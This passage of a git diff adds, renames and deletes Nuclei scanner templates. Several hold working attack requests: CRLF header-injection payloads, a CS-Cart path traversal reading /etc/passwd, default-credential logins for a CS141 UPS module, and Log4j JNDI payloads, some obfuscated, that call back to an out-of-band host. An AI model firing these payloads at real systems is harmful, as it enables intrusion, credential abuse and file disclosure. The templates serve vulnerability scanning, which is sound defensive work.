- - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
-
- matchers:
- - type: regex
- regex:
- - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
- part: header
diff --git a/nuclei-templates/Other/crlf-injection.yaml b/nuclei-templates/Other/crlf-injection.yaml
new file mode 100644
index 0000000000..2fe6563ca0
--- /dev/null
+++ b/nuclei-templates/Other/crlf-injection.yaml
@@ -0,0 +1,27 @@
+id: crlf-injection
+
+info:
+ name: CRLF injection
+ author: melbadry9,nadino,xElkomy
+ severity: low
+ description: Improper sanitization of CRLF sequences.
+ tags: crlf,generic
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
+ - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass
+ - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection"
+ - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
+ - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
+ - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache
+ - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
+ - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
+
+ stop-at-first-match: true
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
+ part: header
diff --git a/nuclei-templates/Other/crush-ftp-detect-1271.yaml b/nuclei-templates/Other/crush-ftp-detect.yaml
similarity index 100%
rename from nuclei-templates/Other/crush-ftp-detect-1271.yaml
rename to nuclei-templates/Other/crush-ftp-detect.yaml
diff --git a/nuclei-templates/Other/cs-cart-unauthenticated-lfi-1282.yaml b/nuclei-templates/Other/cs-cart-unauthenticated-lfi-1282.yaml
deleted file mode 100644
index 7ed0996500..0000000000
--- a/nuclei-templates/Other/cs-cart-unauthenticated-lfi-1282.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: cs-cart-unauthenticated-lfi
-info:
- name: CS-Cart unauthenticated LFI
- author: 0x_Akoko
- severity: high
- description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content.
- reference:
- - https://cxsecurity.com/issue/WLB-2020100100
- tags: cscart,lfi
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cs-cart-unauthenticated-lfi.yaml b/nuclei-templates/Other/cs-cart-unauthenticated-lfi.yaml
new file mode 100644
index 0000000000..790f6f59a5
--- /dev/null
+++ b/nuclei-templates/Other/cs-cart-unauthenticated-lfi.yaml
@@ -0,0 +1,19 @@
+id: cs-cart-unauthenticated-lfi
+info:
+ name: CS-Cart unauthenticated LFI
+ author: 0x_Akoko
+ severity: high
+ reference: https://cxsecurity.com/issue/WLB-2020100100
+ tags: cscart,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cs141-default-login-1280.yaml b/nuclei-templates/Other/cs141-default-login-1280.yaml
new file mode 100644
index 0000000000..a7c1b33bda
--- /dev/null
+++ b/nuclei-templates/Other/cs141-default-login-1280.yaml
@@ -0,0 +1,44 @@
+id: cs141-default-login
+info:
+ name: CS141 SNMP Module Default Login
+ author: socketz
+ severity: medium
+ reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
+ tags: hiawatha,iot,default-login
+ metadata:
+ shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
+requests:
+ - raw:
+ - |
+ POST /api/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */*
+ Content-Type: application/json
+
+ {"userName":"{{user}}","password":"{{pass}}"}
+ attack: pitchfork
+ payloads:
+ user:
+ - admin
+ - engineer
+ - guest
+ pass:
+ - cs141-snmp
+ - engineer
+ - guest
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'accessToken'
+ - 'application/json'
+ condition: and
+ part: header
+ - type: status
+ status:
+ - 200
+ extractors:
+ - type: kval
+ kval:
+ - accessToken
diff --git a/nuclei-templates/Other/cs141-default-login.yaml b/nuclei-templates/Other/cs141-default-login.yaml
deleted file mode 100644
index 6e1e37156e..0000000000
--- a/nuclei-templates/Other/cs141-default-login.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: cs141-default-login
-info:
- name: UPS Adapter CS141 SNMP Module Default Login
- author: socketz
- severity: medium
- description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
- reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
- tags: hiawatha,iot,default-login
- metadata:
- shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
- classification:
- cwe-id: CWE-798
-requests:
- - raw:
- - |
- POST /api/login HTTP/1.1
- Host: {{Hostname}}
- Accept: application/json, text/plain, */*
- Content-Type: application/json
-
- {"userName":"{{user}}","password":"{{pass}}"}
- attack: pitchfork
- payloads:
- user:
- - admin
- - engineer
- - guest
- pass:
- - cs141-snmp
- - engineer
- - guest
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'accessToken'
- - 'application/json'
- condition: and
- part: header
- - type: status
- status:
- - 200
- extractors:
- - type: kval
- kval:
- - accessToken
-
-# Enhanced by mp on 2022/03/07
diff --git a/nuclei-templates/Other/csod-panel-1289.yaml b/nuclei-templates/Other/csod-panel-1289.yaml
deleted file mode 100644
index b1bbc95572..0000000000
--- a/nuclei-templates/Other/csod-panel-1289.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: csod-panel
-info:
- name: CornerStoneOnDemand Instance Detection Template
- author: righettod
- severity: info
- description: Try to detect the presence of a CornerStoneOnDemand (CSOD www.cornerstoneondemand.com) instance via the login page
- tags: panel,csod
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- redirects: true
- max-redirects: 5
- matchers:
- - type: word
- words:
- - "csod-custom"
- - "csodcommon"
- part: body
- condition: or
diff --git a/nuclei-templates/Other/csod-panel.yaml b/nuclei-templates/Other/csod-panel.yaml
new file mode 100644
index 0000000000..c3bb48b3aa
--- /dev/null
+++ b/nuclei-templates/Other/csod-panel.yaml
@@ -0,0 +1,20 @@
+id: csod-panel
+info:
+ name: CornerStoneOnDemand Instance Detection Template
+ author: righettod
+ severity: info
+ description: Try to detect the presence of a CornerStoneOnDemand (CSOD www.cornerstoneondemand.com) instance via the login page
+ tags: panel,csod
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ redirects: true
+ max-redirects: 5
+ matchers:
+ - type: word
+ words:
+ - "csod-custom"
+ - "csodcommon"
+ part: body
+ condition: or
diff --git a/nuclei-templates/Other/csrfguard-detect-1290.yaml b/nuclei-templates/Other/csrfguard-detect-1290.yaml
deleted file mode 100644
index 434e49d428..0000000000
--- a/nuclei-templates/Other/csrfguard-detect-1290.yaml
+++ /dev/null
@@ -1,72 +0,0 @@
-id: csrf-guard-detect
-
-info:
- name: OWASP CSRF Guard detection
- author: forgedhallpass
- severity: info
- description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration.
- reference:
- - https://github.com/OWASP/www-project-csrfguard
- tags: tech,csrfguard,owasp
-
-requests:
- - raw:
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
-
- - |
- GET /JavaScriptServlet HTTP/1.1
- Host: {{Hostname}}
- Referer: {{BaseURL}}
-
- - |
- POST /JavaScriptServlet HTTP/1.1
- Host: {{Hostname}}
- OWASP-CSRFTOKEN: {{masterToken}}
-
- matchers-condition: or
- matchers:
- - type: word
- name: "CSRFGuard-v3.x"
- words:
- - "FETCH-CSRF-TOKEN"
-
- - type: word
- name: "CSRFGuard-v4.x"
- words:
- - "masterTokenValue"
-
- - type: dsl
- name: "Disabled-token-per-page"
- condition: and
- dsl:
- - 'status_code_3==400'
- - 'contains(body, "Token-Per-Page functionality is disabled")'
-
- - type: dsl
- name: "Enabled-token-per-page"
- condition: and
- dsl:
- - 'status_code_3==200'
- - 'contains(body, "{\"pageTokens")'
-
- cookie-reuse: true
- extractors:
- - type: regex
- name: masterToken
- internal: true
- group: 1
- regex:
- - "(?:masterTokenValue\\s*=\\s*')([^']+)';"
-
- - type: regex
- group: 1
- name: "master-token"
- regex:
- - "(?:masterTokenValue\\s*=\\s*')([^']+)';"
-
- - type: json
- name: "page-token"
- json:
- - '.pageTokens'
diff --git a/nuclei-templates/Other/csrfguard-detect-1291.yaml b/nuclei-templates/Other/csrfguard-detect-1291.yaml
new file mode 100644
index 0000000000..f3242a8547
--- /dev/null
+++ b/nuclei-templates/Other/csrfguard-detect-1291.yaml
@@ -0,0 +1,71 @@
+id: csrf-guard-detect
+
+info:
+ name: OWASP CSRF Guard detection
+ author: forgedhallpass
+ severity: info
+ description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration.
+ reference: https://github.com/OWASP/www-project-csrfguard
+ tags: tech,csrfguard,owasp
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /JavaScriptServlet HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}
+
+ - |
+ POST /JavaScriptServlet HTTP/1.1
+ Host: {{Hostname}}
+ OWASP-CSRFTOKEN: {{masterToken}}
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ name: "CSRFGuard-v3.x"
+ words:
+ - "FETCH-CSRF-TOKEN"
+
+ - type: word
+ name: "CSRFGuard-v4.x"
+ words:
+ - "masterTokenValue"
+
+ - type: dsl
+ name: "Disabled-token-per-page"
+ condition: and
+ dsl:
+ - 'status_code_3==400'
+ - 'contains(body, "Token-Per-Page functionality is disabled")'
+
+ - type: dsl
+ name: "Enabled-token-per-page"
+ condition: and
+ dsl:
+ - 'status_code_3==200'
+ - 'contains(body, "{\"pageTokens")'
+
+ cookie-reuse: true
+ extractors:
+ - type: regex
+ name: masterToken
+ internal: true
+ group: 1
+ regex:
+ - "(?:masterTokenValue\\s*=\\s*')([^']+)';"
+
+ - type: regex
+ group: 1
+ name: "master-token"
+ regex:
+ - "(?:masterTokenValue\\s*=\\s*')([^']+)';"
+
+ - type: json
+ name: "page-token"
+ json:
+ - '.pageTokens'
diff --git a/nuclei-templates/Other/custom-data-alert-engine-service-detect.yaml b/nuclei-templates/Other/custom-data-alert-engine-service-detect.yaml
new file mode 100644
index 0000000000..591745567f
--- /dev/null
+++ b/nuclei-templates/Other/custom-data-alert-engine-service-detect.yaml
@@ -0,0 +1,19 @@
+id: custom-datapump-source-code-detect
+
+info:
+ name: Custom datapump source code detect
+ author: pdteam
+ severity: medium
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/connect/datapump/api-docs/service.json'
+ matchers:
+ - type: word
+ words:
+ - 'swagger'
+ - 'info'
+ condition: and
+
diff --git a/nuclei-templates/Other/custom-datadump-source-code-detect.yaml b/nuclei-templates/Other/custom-datadump-source-code-detect.yaml
deleted file mode 100644
index cb0b2dba78..0000000000
--- a/nuclei-templates/Other/custom-datadump-source-code-detect.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: custom-datapump-source-code-detect
-
-info:
- name: Custom datapump source code detect
- author: pdteam
- severity: medium
- tags: config,exposure
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/alert-engine/api-docs/service.json'
- matchers:
- - type: word
- words:
- - 'swagger'
- - 'info'
- condition: and
-
diff --git a/nuclei-templates/Other/custom-swagger-ui-detect.yaml b/nuclei-templates/Other/custom-swagger-ui-detect.yaml
deleted file mode 100644
index 12d472625a..0000000000
--- a/nuclei-templates/Other/custom-swagger-ui-detect.yaml
+++ /dev/null
@@ -1,81 +0,0 @@
-id: swagger-api
-
-info:
- name: Public Swagger API
- author: pdteam,c-sh0
- severity: info
- tags: exposure,api,swagger
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/swagger-ui/swagger-ui.js"
- - "{{BaseURL}}/swagger/swagger-ui.js"
- - "{{BaseURL}}/swagger-ui.js"
- - "{{BaseURL}}/swagger/ui/swagger-ui.js"
- - "{{BaseURL}}/swagger/ui/index"
- - "{{BaseURL}}/swagger/index.html"
- - "{{BaseURL}}/swagger-ui.html"
- - "{{BaseURL}}/swagger/swagger-ui.html"
- - "{{BaseURL}}/api/swagger-ui.html"
- - "{{BaseURL}}/api-docs/swagger.json"
- - "{{BaseURL}}/api-docs/swagger.yaml"
- - "{{BaseURL}}/api_docs"
- - "{{BaseURL}}/swagger.json"
- - "{{BaseURL}}/swagger.yaml"
- - "{{BaseURL}}/swagger/v1/swagger.json"
- - "{{BaseURL}}/swagger/v1/swagger.yaml"
- - "{{BaseURL}}/api/index.html"
- - "{{BaseURL}}/api/docs/"
- - "{{BaseURL}}/api/swagger.json"
- - "{{BaseURL}}/api/swagger.yaml"
- - "{{BaseURL}}/api/swagger.yml"
- - "{{BaseURL}}/api/swagger/index.html"
- - "{{BaseURL}}/api/swagger/swagger-ui.html"
- - "{{BaseURL}}/api/api-docs/swagger.json"
- - "{{BaseURL}}/api/api-docs/swagger.yaml"
- - "{{BaseURL}}/api/swagger-ui/swagger.json"
- - "{{BaseURL}}/api/swagger-ui/swagger.yaml"
- - "{{BaseURL}}/api/apidocs/swagger.json"
- - "{{BaseURL}}/api/apidocs/swagger.yaml"
- - "{{BaseURL}}/api/swagger-ui/api-docs"
- - "{{BaseURL}}/api/api-docs"
- - "{{BaseURL}}/api/apidocs"
- - "{{BaseURL}}/api/swagger"
- - "{{BaseURL}}/api/swagger/static/index.html"
- - "{{BaseURL}}/api/swagger-resources"
- - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs"
- - "{{BaseURL}}/api/__swagger__/"
- - "{{BaseURL}}/api/_swagger_/"
- - "{{BaseURL}}/api/spec/swagger.json"
- - "{{BaseURL}}/api/spec/swagger.yaml"
- - "{{BaseURL}}/api/swagger/ui/index"
- - "{{BaseURL}}/__swagger__/"
- - "{{BaseURL}}/_swagger_/"
- - "{{BaseURL}}/api/v1/swagger-ui/swagger.json"
- - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
- - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
- - "{{BaseURL}}/api/swagger_doc.json"
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "swagger:"
- - "Swagger 2.0"
- - "\"swagger\":"
- - "Swagger UI"
- - "**token**:"
- condition: or
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
diff --git a/nuclei-templates/Other/custom_nuclei-1.yaml b/nuclei-templates/Other/custom_nuclei-1.yaml
deleted file mode 100644
index d8fd60e109..0000000000
--- a/nuclei-templates/Other/custom_nuclei-1.yaml
+++ /dev/null
@@ -1,70 +0,0 @@
-id: CVE-2021-44228
-
-info:
- name: Remote code injection in Log4j
- author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
- severity: critical
- description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
- reference:
- - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- - https://www.lunasec.io/docs/blog/log4j-zero-day/
- - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
- tags: cve,cve2021,rce,oast,log4j,injection
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.00
- cve-id: CVE-2021-44228
- cwe-id: CWE-502
-
-requests:
- - raw:
- - |
- GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
- Host: {{Hostname}}
- Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
- Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
- Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
- Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
- Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
- Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
- Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
- Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
- Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
- Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
- Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
- Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
- User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
- X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
- X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
- X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
- X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
- X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
-
- matchers-condition: and
- matchers:
- - type: word
- part: interactsh_protocol # Confirms the DNS Interaction
- words:
- - "dns"
-
- - type: regex
- part: interactsh_request
- regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
-
- extractors:
- - type: kval
- kval:
- - interactsh_ip # Print remote interaction IP in output
-
- - type: regex
- part: interactsh_request
- group: 2
- regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
-
- - type: regex
- part: interactsh_request
- group: 1
- regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
diff --git a/nuclei-templates/Other/custom_nuclei-5.yaml b/nuclei-templates/Other/custom_nuclei-5.yaml
new file mode 100644
index 0000000000..a595763c16
--- /dev/null
+++ b/nuclei-templates/Other/custom_nuclei-5.yaml
@@ -0,0 +1,48 @@
+id: CVE-2021-44228
+
+info:
+ name: Remote code injection in Log4j
+ author: melbadry9,dhiyaneshDK,daffainfo
+ severity: critical
+ description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+ reference:
+ - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
+ - https://www.lunasec.io/docs/blog/log4j-zero-day/
+ - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
+ tags: cve,cve2021,rce,oast,log4j
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{interactsh-url}}/poc}
+ X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{interactsh-url}}/poc}
+ Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{interactsh-url}}/poc}
+ X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{interactsh-url}}/poc}
+ Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{interactsh-url}}/poc}
+
+
+
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+
+ extractors:
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
diff --git a/nuclei-templates/CVE-2021/cve-2021-20837.yaml b/nuclei-templates/Other/cve202120837-220331-223044.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-20837.yaml
rename to nuclei-templates/Other/cve202120837-220331-223044.yaml
